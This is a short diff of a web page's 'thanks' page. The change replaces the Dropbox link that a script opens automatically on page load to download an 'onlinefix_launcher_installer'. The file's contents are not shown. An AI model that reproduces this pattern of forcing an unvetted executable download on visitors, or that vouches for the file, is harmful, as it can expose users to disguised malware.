--- a/pages/ofmeThanks.html
+++ b/pages/ofmeThanks.html
@@ -90,7 +90,7 @@
         </div>
     </div>
     <script>
-        window.location.href = "https://www.dropbox.com/scl/fi/prnkrmsdo3drh7hk7i52d/onlinefix_launcher_installer?rlkey=hbm0btic9vtqrnz4yuhmaxi56&st=8t6uwn4b&dl=1";
+        window.location.href = "https://www.dropbox.com/scl/fi/ktvxtkdlljjwj2i3n85m0/onlinefix_launcher_installer?rlkey=xeck981v9vsrcmbtymsbv3ajm&st=4q5kxx26&dl=1";
     </script>
 </body>
 </html>
